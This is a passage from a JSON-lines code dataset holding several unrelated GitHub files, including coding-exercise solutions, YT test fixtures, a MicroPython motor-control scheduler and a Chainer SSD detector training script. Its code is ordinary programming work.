time.sleep(5)\n\n search_page = YandexSearchResultsPage(page.w)\n assert search_page.results_count() == 12\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"qa_python/lesson006/yandex_example/test_page_object_example.py","file_name":"test_page_object_example.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9590578205","text":"# 놀이기구 처음 이용료는 price\n# N번째 이용시 원래 이용료의 N배\n# ex) 100원, 3번 -> 100원, 200원, 300원\n# N번 이용시 모자라는 금액 return, 모자라지 않은 경우 0 return\n\ndef solution(price, money, count):\n answer = 0\n \n sum = 0\n for i in range(1, count+1):\n sum += price * i\n \n if sum > money:\n answer = sum - money\n else:\n return answer\n \n return answer\n\n# 제한사항\n# 놀이기구의 이용료 price : 1 ≤ price ≤ 2,500, price는 자연수\n# 처음 가지고 있던 금액 money : 1 ≤ money ≤ 1,000,000,000, money는 자연수\n# 놀이기구의 이용 횟수 count : 1 ≤ count ≤ 2,500, count는 자연수\n\n# 입출력 예\n# price\tmoney\tcount\tresult\n# 3\t 20\t 4\t 10","repo_name":"mieumje/Python_Coding_Test","sub_path":"Level1_Programmers/부족한 금액 계산하기.py","file_name":"부족한 금액 계산하기.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"87642019","text":"import pytest\n\nfrom crypta.lib.proto.user_data.user_data_pb2 import TUserData\nfrom crypta.lib.python.yql import proto_field as yql_proto_field\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n row_transformers,\n tables,\n)\nfrom crypta.siberia.bin.common.proto.crypta_id_user_data_pb2 import TCryptaIdUserData\nfrom crypta.siberia.bin.common.yt_describer.proto.group_stats_pb2 import TGroupStats\n\n\n@pytest.fixture(scope=\"function\")\ndef crypta_id_user_data_table():\n def get_crypta_id_user_data_table(filename, path):\n on_write = tables.OnWrite(\n sort_by=['crypta_id'],\n attributes={'schema': 
schema_utils.get_schema_from_proto(TCryptaIdUserData)},\n row_transformer=row_transformers.proto_dict_to_yson(TCryptaIdUserData),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return get_crypta_id_user_data_table\n\n\n@pytest.fixture(scope=\"function\")\ndef user_data_table():\n def get_user_data_table(filename, path):\n on_write = tables.OnWrite(\n sort_by=['yuid'],\n attributes=dict([('schema', schema_utils.get_schema_from_proto(TUserData))] +\n list(yql_proto_field.get_attrs(TUserData).items())),\n row_transformer=row_transformers.proto_dict_to_yson(TUserData),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return get_user_data_table\n\n\n@pytest.fixture(scope=\"function\")\ndef segment_stats_table():\n def get_segment_stats_table(filename, path):\n on_write = tables.OnWrite(\n attributes={'schema': schema_utils.get_schema_from_proto(TGroupStats, key_columns=['GroupID'])},\n row_transformer=row_transformers.proto_dict_to_yson(TGroupStats),\n )\n return tables.YsonTable(\n filename,\n path,\n on_write=on_write,\n )\n return get_segment_stats_table\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test_utils/user_data_fixture.py","file_name":"user_data_fixture.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2242921131","text":"class Solution:\n def reconstructQueue(self, people):\n \"\"\"\n :type people: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n reconstructedQueue = []\n \n # key: h, value = [h,k]\n sorted_map = {}\n \n # Create a map for people that have the same h\n for person in people:\n \n if person[0] in sorted_map:\n sorted_map[person[0]].append(person)\n else:\n sorted_map[person[0]] = [person]\n \n for key in sorted_map:\n sorted_map[key] = sorted(sorted_map[key])\n \n for key in sorted(sorted_map,reverse = True):\n \n for person in sorted_map[key]:\n reconstructedQueue.insert(person[1],person[:])\n \n return reconstructedQueue","repo_name":"chungyang/LeetCode","sub_path":"src/reconstructQueue.py","file_name":"reconstructQueue.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7398394895","text":"\"\"\"!\n@file main.py\n This file contains a task scheduling program that performs two step response tests on two different motors simultaneously.\n\n@author Richard Kwan, Chayton Ritter, Jackie Chen, JR Ridgely\n@date 2023-Feb-7 Created by modifying existing task sharing example by JR Ridgely\n\"\"\"\n\nimport gc\nimport pyb\nimport utime\nimport cotask\nimport motor_driver\nimport encoder_reader\nimport closedloopcontrol\n\ndef task_mc(motor, encoder, controller):\n '''!\n Task which proportionally controls a motor.\n @param motor A motor object\n @param encoder An encoder object\n @param controller A controller object\n '''\n # Adjust motor power\n while True:\n a = controller.run(encoder.read())\n yield\n motor.set_duty_cycle(a)\n yield\n\n\nif __name__ == \"__main__\":\n \n # Initialize UART\n u2 = pyb.UART(2, baudrate=115200)\n \n # Initialize motor/encoder/controller 1\n M1 = motor_driver.MotorDriver('A10', 'B4', 'B5', 3, 1, 2)\n E1 = encoder_reader.EncoderReader('C6', 'C7', 8, 1, 2)\n C1 = closedloopcontrol.cl_loop(0.015, 5000)\n M1.enable_motor()\n \n # Initialize motor/encoder/controller 2\n M2 = motor_driver.MotorDriver('C1', 'A0', 'A1', 5, 1, 2)\n E2 = 
encoder_reader.EncoderReader('B6', 'B7', 4, 1, 2)\n C2 = closedloopcontrol.cl_loop(0.015, 10000)\n M2.enable_motor()\n \n # Create tasks\n task1 = cotask.Task(task_mc, name='Motor_1', priority=1, period=10,\n profile=True, trace=False, mec=(M1, E1, C1))\n task2 = cotask.Task(task_mc, name='Motor_2', priority=2, period=10,\n profile=True, trace=False, mec=(M2, E2, C2))\n cotask.task_list.append(task1)\n cotask.task_list.append(task2)\n\n # Run the memory garbage collector to ensure memory is as defragmented as\n # possible before the real-time scheduler is started\n gc.collect()\n\n # Start timer\n start_time = utime.ticks_ms()\n\n # Run the scheduler with the chosen scheduling algorithm. Quit if ^C pressed\n while True:\n try:\n cotask.task_list.pri_sched()\n \n time_diff = utime.ticks_diff(utime.ticks_ms(), start_time)\n if time_diff > 3000:\n break\n except KeyboardInterrupt:\n break\n\n # Turn off motors\n M1.set_duty_cycle(0)\n M2.set_duty_cycle(0)\n M1.disable_motor()\n M2.disable_motor()\n \n # Transmit data back\n pos_1 = C1.get_pos_data()\n pos_1str = [str(i) for i in pos_1]\n pos_2 = C2.get_pos_data()\n pos_2str = [str(i) for i in pos_2]\n tx1 = ','.join(pos_1str)\n tx2 = ','.join(pos_2str)\n u2.write(tx1+'\\n')\n utime.sleep_ms(1000)\n u2.write(tx2+'\\n')\n","repo_name":"artificialsalt/405L3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15138027929","text":"def dsum(n):\r\n ret = 0\r\n while n > 0:\r\n ret += n % 10\r\n n //= 10\r\n return ret\r\nn = int(input())\r\nans = 10**7\r\nfor i in range(1, n//2+1):\r\n ans = min(ans, dsum(i) + dsum(n-i))\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc025/A/4809844.py","file_name":"4809844.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"13096312546","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport json\nimport multiprocessing\nimport os\nimport random\nimport sys\nimport threading\nimport time\nimport math\n\nimport numpy as np\nimport six\nimport six.moves.cPickle as pickle\nfrom six.moves import queue\n\nimport chainer\nfrom chainer import computational_graph\nfrom chainer import cuda\nfrom chainer import optimizers\nfrom chainer import serializers\nfrom chainer import link\nimport chainer.functions as F\n\nfrom glob import glob\nfrom os import path\n\n#import cPickle\nimport _pickle as cPickle\nimport cv2 as cv\n\nimport common_params\nfrom data_augmentation import trainAugmentation\nfrom my_func import SumSquaredError\nfrom my_func import sum_squared_error\n\ncv.CV_AA = cv.LINE_AA\n\ndef copy_model(src, dst):\n assert isinstance(src, link.Chain)\n assert isinstance(dst, link.Chain)\n\n for child in src.children():\n if child.name not in dst.__dict__:\n continue\n dst_child = dst[child.name]\n if type(child) != type(dst_child):\n continue\n if isinstance(child, link.Chain):\n copy_model(child, dst_child)\n if isinstance(child, link.Link):\n match = True\n for a, b in zip(child.namedparams(), dst_child.namedparams()):\n if a[0] != b[0]:\n match = False\n break\n if a[1].data.shape != b[1].data.shape:\n match = False\n break\n if not match:\n print('Ignore %s because of parameter mismatch' % child.name)\n continue\n for a, b in zip(child.namedparams(), dst_child.namedparams()):\n b[1].data = a[1].data\n print('Copy %s' % child.name)\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchsize', '-B', type = int, default = 8, help = 'Learning minibatch size')\nparser.add_argument('--epoch', '-E', default = 80, type = int, help='Number of epochs to learn')\nparser.add_argument('--gpu', '-g', default = -1, type = int, help='GPU ID (negative value indicates CPU)')\nparser.add_argument('--loaderjob', '-j', default = 4, type=int, help='Number of parallel data loading processes')\nparser.add_argument('--suffix', '-S', default = \"\", type=str, help='Suffix of model saving directory')\nargs = parser.parse_args()\n\nif args.gpu >= 0:\n cuda.check_cuda_available()\nxp = cuda.cupy if args.gpu >= 0 else np\n\n\nprint('VGG Netの読み込み中...')\nfrom VGG_Net import VGGNet\nvgg_model = VGGNet()\nserializers.load_npz('./pretrained_model/VGGNet_for_SSD_ILSVRC.model', vgg_model)\nprint('-> 読み込み完了')\n\nfrom SSD_Net import SSDNet\nssd_model = SSDNet()\n\nif args.gpu >= 0:\n cuda.get_device(args.gpu).use()\n vgg_model.to_gpu()\n ssd_model.to_gpu()\n\ncopy_model(vgg_model, ssd_model)\n\ndel (vgg_model)\n\n# Setup optimizer\n# AdamよりMomentumSGDの方か良い?? (YOLOはMomentumSGDで実装されている)\n#optimizer = optimizers.Adam()\noptimizer = optimizers.MomentumSGD(lr = common_params.learning_rate, momentum = common_params.momentum)\n\noptimizer.setup(ssd_model)\n\noptimizer.add_hook(chainer.optimizer.WeightDecay(common_params.weight_decay))\n\n# epoch数\nn_epoch = args.epoch\n\n# バッチサイズ\nbatchsize = args.batchsize\n\nstep = int(math.floor((common_params.max_ratio - common_params.min_ratio) / (len(common_params.mbox_source_layers) - 2)))\n\nmin_sizes = []\nmax_sizes = []\n\n# Default boxの最小・最大サイズを計算\nfor ratio in range(common_params.min_ratio, common_params.max_ratio + 1, step):\n min_sizes.append(common_params.insize * ratio / 100.)\n max_sizes.append(common_params.insize * (ratio + step) / 100.)\n\nmin_sizes = [common_params.insize * 10 / 100.] 
+ min_sizes\nmax_sizes = [common_params.insize * 20 / 100.] + max_sizes\n\n\n\n# 学習データの読み込み\ndef readTrainData(input_name, confing_image):\n\n aug_p = open(common_params.images_dir + '/train/img_aug_param/' + input_name + '.txt', 'r')\n\n in_line = aug_p.readline()\n opath = in_line.split(' \\n')\n original_img_path = str(opath[0])\n\n in_line = aug_p.readline()\n augmentation = int(in_line)\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n border_pixels = [int(part[0]), int(part[1]), int(part[2]), int(part[3])]\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n crop_param = [float(part[0]), float(part[1]), float(part[2]), float(part[3])]\n\n in_line = aug_p.readline()\n part = in_line.split(' ')\n hsv_param = [float(part[0]), float(part[1]), float(part[2])]\n\n in_line = aug_p.readline()\n flip_type = int(in_line)\n\n\n # 入力画像の読み込み\n color_img = cv.imread(common_params.images_dir + '/train/rgb/' + original_img_path + '.png', cv.IMREAD_COLOR)\n\n if color_img is None:\n print('画像が読み込めません')\n print(common_params.images_dir + '/train/rgb/' + original_img_path + '.png')\n sys.exit(1)\n\n # 画像をSSDの入力サイズにリサイズ\n input_img = cv.resize(color_img, (common_params.insize, common_params.insize), interpolation = cv.INTER_CUBIC)\n\n if augmentation == 1:\n input_img = trainAugmentation(input_img, border_pixels, crop_param, hsv_param, flip_type)\n\n if confing_image:\n conf_img = input_img.copy()\n\n # 画像データをfloatに変換\n input_img = input_img.astype(np.float32)\n\n # 画像の平均値を引く\n input_img -= np.array([103.939, 116.779, 123.68])\n\n #input_img /= 255.\n\n # 画像の次元を(高さ,幅,チャンネル数)から(チャンネル数, 高さ,幅)へ転置\n input_img = input_img.transpose(2, 0, 1)\n\n gt_boxes = []\n df_boxes = []\n indices = []\n classes = []\n\n idx_tmp = []\n\n # positiveサンプルの読み込み\n pos_num = 0\n f = open(common_params.images_dir + '/train/positives/' + input_name + '.txt', 'r')\n for rw in f:\n ln = rw.split(' ')\n classes.append(int(ln[1]))\n gt_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n df_boxes.append([float(ln[6]), float(ln[7]), float(ln[8]), float(ln[9])])\n indices.append([int(ln[10]), int(ln[11]), int(ln[12]), int(ln[13])])\n pos_num += 1\n f.close()\n\n # hard negativeサンプルの読み込み (最大でpositiveサンプル数の3倍)\n neg_num = 0\n f = open(common_params.images_dir + '/train/negatives/' + input_name + '.txt', 'r')\n for rw in f:\n ln = rw.split(' ')\n classes.append(int(ln[1]))\n gt_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n df_boxes.append([float(ln[2]), float(ln[3]), float(ln[4]), float(ln[5])])\n idx_tmp.append([int(ln[10]), int(ln[11]), int(ln[12]), int(ln[13])])\n neg_num += 1\n f.close()\n\n hardneg_size = pos_num * 3 if neg_num > (pos_num * 3) else neg_num\n\n perm = np.random.permutation(len(idx_tmp))\n\n for hn in range(0, hardneg_size):\n indices.append(idx_tmp[perm[hn]])\n\n\n return (input_img, gt_boxes, df_boxes, indices, classes, conf_img)\n\n\n\n# 誤差関数\ndef lossFunction(Loc, Cls, gt_box_batch, df_box_batch, idx_batch, cls_batch, bat_s, mining):\n\n if mining:\n # hard negative mining有効時のクラスラベル\n cls_t1 = np.ones((bat_s, common_params.num_boxes[0], common_params.map_sizes[0], common_params.map_sizes[0]), np.int32) * -1\n cls_t2 = np.ones((bat_s, common_params.num_boxes[1], common_params.map_sizes[1], common_params.map_sizes[1]), np.int32) * -1\n cls_t3 = np.ones((bat_s, common_params.num_boxes[2], common_params.map_sizes[2], common_params.map_sizes[2]), np.int32) * -1\n cls_t4 = np.ones((bat_s, common_params.num_boxes[3], common_params.map_sizes[3], 
common_params.map_sizes[3]), np.int32) * -1\n cls_t5 = np.ones((bat_s, common_params.num_boxes[4], common_params.map_sizes[4], common_params.map_sizes[4]), np.int32) * -1\n cls_t6 = np.ones((bat_s, common_params.num_boxes[5], common_params.map_sizes[5], common_params.map_sizes[5]), np.int32) * -1\n else:\n # hard negative mining無効時のクラスラベル\n cls_t1 = np.zeros((bat_s, common_params.num_boxes[0], common_params.map_sizes[0], common_params.map_sizes[0]), np.int32)\n cls_t2 = np.zeros((bat_s, common_params.num_boxes[1], common_params.map_sizes[1], common_params.map_sizes[1]), np.int32)\n cls_t3 = np.zeros((bat_s, common_params.num_boxes[2], common_params.map_sizes[2], common_params.map_sizes[2]), np.int32)\n cls_t4 = np.zeros((bat_s, common_params.num_boxes[3], common_params.map_sizes[3], common_params.map_sizes[3]), np.int32)\n cls_t5 = np.zeros((bat_s, common_params.num_boxes[4], common_params.map_sizes[4], common_params.map_sizes[4]), np.int32)\n cls_t6 = np.zeros((bat_s, common_params.num_boxes[5], common_params.map_sizes[5], common_params.map_sizes[5]), np.int32)\n\n # bounding boxのオフセットベクトルの教示データ\n loc_t1 = np.zeros((bat_s, common_params.num_boxes[0] * common_params.num_of_offset_dims, common_params.map_sizes[0], common_params.map_sizes[0]), np.float32)\n loc_t2 = np.zeros((bat_s, common_params.num_boxes[1] * common_params.num_of_offset_dims, common_params.map_sizes[1], common_params.map_sizes[1]), np.float32)\n loc_t3 = np.zeros((bat_s, common_params.num_boxes[2] * common_params.num_of_offset_dims, common_params.map_sizes[2], common_params.map_sizes[2]), np.float32)\n loc_t4 = np.zeros((bat_s, common_params.num_boxes[3] * common_params.num_of_offset_dims, common_params.map_sizes[3], common_params.map_sizes[3]), np.float32)\n loc_t5 = np.zeros((bat_s, common_params.num_boxes[4] * common_params.num_of_offset_dims, common_params.map_sizes[4], common_params.map_sizes[4]), np.float32)\n loc_t6 = np.zeros((bat_s, common_params.num_boxes[5] * common_params.num_of_offset_dims, common_params.map_sizes[5], common_params.map_sizes[5]), np.float32)\n\n for b in range(0, len(idx_batch)):\n for i in range(0, len(idx_batch[b])):\n\n fmap_layer = idx_batch[b][i][1]\n fmap_position = idx_batch[b][i][2]\n df_box_num = idx_batch[b][i][3]\n st_box_idx = df_box_num * common_params.num_of_offset_dims\n ed_box_idx = st_box_idx + common_params.num_of_offset_dims\n\n c = int(fmap_position % common_params.map_sizes[fmap_layer])\n r = int(fmap_position / common_params.map_sizes[fmap_layer])\n\n item_class_id = cls_batch[b][i]\n\n # 1〜6番目のdefault boxのクラスとオフセットの教示データを格納\n if fmap_layer == 0:\n cls_t1[b, df_box_num, r, c] = item_class_id\n loc_t1[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 1:\n cls_t2[b, df_box_num, r, c] = item_class_id\n loc_t2[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 2:\n cls_t3[b, df_box_num, r, c] = item_class_id\n loc_t3[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 3:\n cls_t4[b, df_box_num, r, c] = item_class_id\n loc_t4[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 4:\n cls_t5[b, df_box_num, r, c] = 
item_class_id\n loc_t5[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n elif fmap_layer == 5:\n cls_t6[b, df_box_num, r, c] = item_class_id\n loc_t6[b, st_box_idx : ed_box_idx, r, c] = (np.array(gt_box_batch[b][i], np.float32) - np.array(df_box_batch[b][i], np.float32)) / common_params.loc_var\n\n\n # 1〜6階層目の教示confidence mapをint32型のarrayにする\n cls_t1 = xp.array(cls_t1, np.int32)\n cls_t2 = xp.array(cls_t2, np.int32)\n cls_t3 = xp.array(cls_t3, np.int32)\n cls_t4 = xp.array(cls_t4, np.int32)\n cls_t5 = xp.array(cls_t5, np.int32)\n cls_t6 = xp.array(cls_t6, np.int32)\n\n # 1〜6階層目の教示confidence mapをVariableにする\n cls_t1_data = chainer.Variable(cls_t1)\n cls_t2_data = chainer.Variable(cls_t2)\n cls_t3_data = chainer.Variable(cls_t3)\n cls_t4_data = chainer.Variable(cls_t4)\n cls_t5_data = chainer.Variable(cls_t5)\n cls_t6_data = chainer.Variable(cls_t6)\n\n # 1〜6階層目の教示confidence mapの次元を(バッチ数, DF box数, 高さ, 幅)から(バッチ数, 高さ, 幅, DF box数)に転置\n cls_t1_data = F.transpose(cls_t1_data, [0, 2, 3, 1])\n cls_t2_data = F.transpose(cls_t2_data, [0, 2, 3, 1])\n cls_t3_data = F.transpose(cls_t3_data, [0, 2, 3, 1])\n cls_t4_data = F.transpose(cls_t4_data, [0, 2, 3, 1])\n cls_t5_data = F.transpose(cls_t5_data, [0, 2, 3, 1])\n cls_t6_data = F.transpose(cls_t6_data, [0, 2, 3, 1])\n\n # 1〜6階層目の教示confidence mapの各次元数を(バッチ数, 高さ, 幅, DF box数)から(バッチ数 * 高さ * 幅 * DF box数)にreshape\n cls_t1_data = F.reshape(cls_t1_data, [cls_t1_data.data.shape[0] * cls_t1_data.data.shape[1] * cls_t1_data.data.shape[2] * common_params.num_boxes[0]])\n cls_t2_data = F.reshape(cls_t2_data, [cls_t2_data.data.shape[0] * cls_t2_data.data.shape[1] * cls_t2_data.data.shape[2] * common_params.num_boxes[1]])\n cls_t3_data = F.reshape(cls_t3_data, [cls_t3_data.data.shape[0] * cls_t3_data.data.shape[1] * cls_t3_data.data.shape[2] * common_params.num_boxes[2]])\n cls_t4_data = F.reshape(cls_t4_data, [cls_t4_data.data.shape[0] * cls_t4_data.data.shape[1] * cls_t4_data.data.shape[2] * common_params.num_boxes[3]])\n cls_t5_data = F.reshape(cls_t5_data, [cls_t5_data.data.shape[0] * cls_t5_data.data.shape[1] * cls_t5_data.data.shape[2] * common_params.num_boxes[4]])\n cls_t6_data = F.reshape(cls_t6_data, [cls_t6_data.data.shape[0] * cls_t6_data.data.shape[1] * cls_t6_data.data.shape[2] * common_params.num_boxes[5]])\n\n # 1〜6階層目の教示localization mapをfloat32型のarrayにする\n loc_t1 = xp.array(loc_t1, np.float32)\n loc_t2 = xp.array(loc_t2, np.float32)\n loc_t3 = xp.array(loc_t3, np.float32)\n loc_t4 = xp.array(loc_t4, np.float32)\n loc_t5 = xp.array(loc_t5, np.float32)\n loc_t6 = xp.array(loc_t6, np.float32)\n\n # 1〜6階層目の教示localization mapをVariableにする\n loc_t1_data = chainer.Variable(loc_t1)\n loc_t2_data = chainer.Variable(loc_t2)\n loc_t3_data = chainer.Variable(loc_t3)\n loc_t4_data = chainer.Variable(loc_t4)\n loc_t5_data = chainer.Variable(loc_t5)\n loc_t6_data = chainer.Variable(loc_t6)\n\n # 1〜6階層目の教示localization mapの次元を(バッチ数, オフセット次元数 * DF box数, 高さ, 幅)から(バッチ数, 高さ, 幅, オフセット次元数 * DF box数)に転置\n loc_t1_data = F.transpose(loc_t1_data, [0, 2, 3, 1])\n loc_t2_data = F.transpose(loc_t2_data, [0, 2, 3, 1])\n loc_t3_data = F.transpose(loc_t3_data, [0, 2, 3, 1])\n loc_t4_data = F.transpose(loc_t4_data, [0, 2, 3, 1])\n loc_t5_data = F.transpose(loc_t5_data, [0, 2, 3, 1])\n loc_t6_data = F.transpose(loc_t6_data, [0, 2, 3, 1])\n\n # 1〜6階層目の教示localization mapの各次元数を(バッチ数, 高さ, 幅, オフセット次元数 * DF box数)から(バッチ数 * 高さ * 幅 * DF box数, オフセット次元数)にreshape\n loc_t1_data = F.reshape(loc_t1_data, 
[loc_t1_data.data.shape[0] * loc_t1_data.data.shape[1] * loc_t1_data.data.shape[2] * common_params.num_boxes[0], int(loc_t1_data.data.shape[3] / common_params.num_boxes[0])])\n loc_t2_data = F.reshape(loc_t2_data, [loc_t2_data.data.shape[0] * loc_t2_data.data.shape[1] * loc_t2_data.data.shape[2] * common_params.num_boxes[1], int(loc_t2_data.data.shape[3] / common_params.num_boxes[1])])\n loc_t3_data = F.reshape(loc_t3_data, [loc_t3_data.data.shape[0] * loc_t3_data.data.shape[1] * loc_t3_data.data.shape[2] * common_params.num_boxes[2], int(loc_t3_data.data.shape[3] / common_params.num_boxes[2])])\n loc_t4_data = F.reshape(loc_t4_data, [loc_t4_data.data.shape[0] * loc_t4_data.data.shape[1] * loc_t4_data.data.shape[2] * common_params.num_boxes[3], int(loc_t4_data.data.shape[3] / common_params.num_boxes[3])])\n loc_t5_data = F.reshape(loc_t5_data, [loc_t5_data.data.shape[0] * loc_t5_data.data.shape[1] * loc_t5_data.data.shape[2] * common_params.num_boxes[4], int(loc_t5_data.data.shape[3] / common_params.num_boxes[4])])\n loc_t6_data = F.reshape(loc_t6_data, [loc_t6_data.data.shape[0] * loc_t6_data.data.shape[1] * loc_t6_data.data.shape[2] * common_params.num_boxes[5], int(loc_t6_data.data.shape[3] / common_params.num_boxes[5])])\n\n # 1〜6階層目の教示confidence mapを結合\n Cls_T = F.concat([cls_t1_data, cls_t2_data, cls_t3_data, cls_t4_data, cls_t5_data, cls_t6_data], axis = 0)\n\n\n # 1〜6階層目の教示localization mapを結合\n Loc_T = F.concat([loc_t1_data, loc_t2_data, loc_t3_data, loc_t4_data, loc_t5_data, loc_t6_data], axis = 0)\n\n # confidence mapのloss\n loss_cls = F.softmax_cross_entropy(Cls, Cls_T)\n\n # localization mapのloss\n # オリジナル実装ではSmooth L1 Lossだが、本ソースコードではMean Squared Errorを使用\n # Smooth L1 Lossで誤差を求める場合は「F.huber_loss(x, t, delta = 1.0)」\n loss_loc = F.mean_squared_error(Loc, Loc_T)\n #loss_loc = F.mean_absolute_error(Loc, LT)\n #loss_loc = sum_squared_error(Loc, LT)\n\n del cls_t1, cls_t2, cls_t3, cls_t4, cls_t5, cls_t6\n del loc_t1, loc_t2, loc_t3, loc_t4, loc_t5, loc_t6\n del cls_t1_data, cls_t2_data, cls_t3_data, cls_t4_data, cls_t5_data, cls_t6_data\n del loc_t1_data, loc_t2_data, loc_t3_data, loc_t4_data, loc_t5_data, loc_t6_data\n\n return (0.4 * loss_loc) + (0.6 * loss_cls)\n\n\n# 学習データリストの読み込み\nf = open('./augimg_name_list.txt', 'r')\ninput_list = []\nfor line in f:\n ln = line.split('\\n')\n input_list.append(ln[0])\nf.close()\n\ninput_list = np.array(input_list)\n\n# 学習データ数\nN = len(input_list)\nprint ('Training samples : ', N)\nitr_loss_save = int((float(N) / float(batchsize)) * 0.1) * 10\nprint ('Training samples per batchsize : ', float(N) / float(batchsize))\nprint ('Iteration save : ', itr_loss_save)\n\nssd_model.train = True\n\ntoday = datetime.datetime.today()\n\ntoday_dir = str(today.year) + '-' + str('%02d' % today.month) + '-' + str('%02d' % today.day) + '@' + str('%02d' % today.hour) + '-' + str('%02d' % today.minute) + '-' + str('%02d' % today.second) + '_' + args.suffix\n\ntoday_dir_path = common_params.save_model_dir + '/' + today_dir\n\nif not path.exists(today_dir_path):\n os.mkdir(today_dir_path)\n\nfout = open(today_dir_path + '/loss.txt', 'w')\n\nsave_model_path = today_dir_path + '/model'\nsave_optimizer_path = today_dir_path + '/optimizer'\n\nif not path.exists(save_model_path):\n os.mkdir(save_model_path)\n\nif not path.exists(save_optimizer_path):\n os.mkdir(save_optimizer_path)\n\n\ndata_q = queue.Queue(maxsize=1)\nres_q = queue.Queue()\n\ndef feed_data():\n i = 0\n\n batch_pool = [None] * batchsize\n\n pool = multiprocessing.Pool(args.loaderjob)\n\n 
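    # The loop below is a producer: worker processes decode augmented samples
    # via pool.apply_async(), full minibatches are pushed into data_q, and the
    # training thread consumes them. A minimal sketch of that pattern, with a
    # hypothetical load_sample() standing in for readTrainData() (this helper
    # is illustrative only and is never called):
    def _producer_sketch(pool, load_sample, names, out_q, batch=8):
        pending = [pool.apply_async(load_sample, (n,)) for n in names[:batch]]
        out_q.put([p.get() for p in pending])  # block until the whole batch is ready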
data_q.put('train')\n\n # エポックループ\n for epoch in range(0, n_epoch):\n\n # changing learning rate (common_params.learning_rate * (common_params.lr_step ** (n_epoch - common_params.lr_change_epoch)))\n if (epoch + 1) >= common_params.lr_change_epoch:\n optimizer.lr *= common_params.lr_step if optimizer.lr >= common_params.lower_lr else common_params.lower_lr\n\n\n print ('\\nEpoch: %d, Learning rate: %f (%s)' % (epoch + 1, optimizer.lr, today_dir))\n\n perm = np.random.permutation(N)\n\n # 学習サンプルのループ\n for dt in range(0, N):\n\n x_list = input_list[perm[dt]]\n\n batch_pool[i] = pool.apply_async(readTrainData, (x_list, True))\n i += 1\n\n img_batch = []\n gt_box_batch = []\n df_box_batch = []\n idx_batch = []\n cls_batch = []\n conf_img_batch = []\n\n if i == batchsize:\n for inc, x_data in enumerate(batch_pool):\n input_img, gt_boxes, df_boxes, indices, classes, conf_img = x_data.get()\n img_batch.append(input_img)\n gt_box_batch.append(gt_boxes)\n df_box_batch.append(df_boxes)\n idx_batch.append(indices)\n cls_batch.append(classes)\n conf_img_batch.append(conf_img)\n data_q.put((img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch, epoch + 1))\n i = 0\n\n del img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch\n\n # 学習したモデルとoptimizerを保存\n if epoch + 1 >= 50:\n if (epoch + 1) % 2 == 0:\n serializers.save_npz(save_model_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_with_mining.model\", ssd_model)\n serializers.save_npz(save_optimizer_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_with_mining.state\", optimizer)\n else:\n serializers.save_npz(save_model_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_without_mining.model\", ssd_model)\n serializers.save_npz(save_optimizer_path + \"/SSD_epoch_\" + str(epoch + 1) + \"_without_mining.state\", optimizer)\n\n pool.close()\n pool.join()\n data_q.put('end')\n\ndef log_result():\n\n sum_loss = 0.\n sum_bat = 0\n itr = 0\n begin_at = time.time()\n\n while True:\n result = res_q.get()\n if result == 'end':\n break\n elif result == 'train':\n continue\n\n loss, bat = result\n\n duration = time.time() - begin_at\n\n sum_loss += loss\n sum_bat += bat\n itr += 1\n\n sys.stdout.write('\\rUpdates: {}, Time: {}, Loss: {}'.format(itr, datetime.timedelta(seconds = duration), loss))\n sys.stdout.flush()\n time.sleep(0.01)\n\n if itr % itr_loss_save == 0:\n print (\" [%d iteration loss: %f]\" % (itr, sum_loss / float(itr_loss_save)))\n out_line = '{} {} {} \\n'.format(itr, sum_loss / float(itr_loss_save), optimizer.lr)\n fout.write(out_line)\n sum_loss = 0.\n sum_bat = 0\n\n\ndef train_loop():\n\n while True:\n input_data = data_q.get()\n if input_data == 'end':\n res_q.put('end')\n break\n elif input_data == 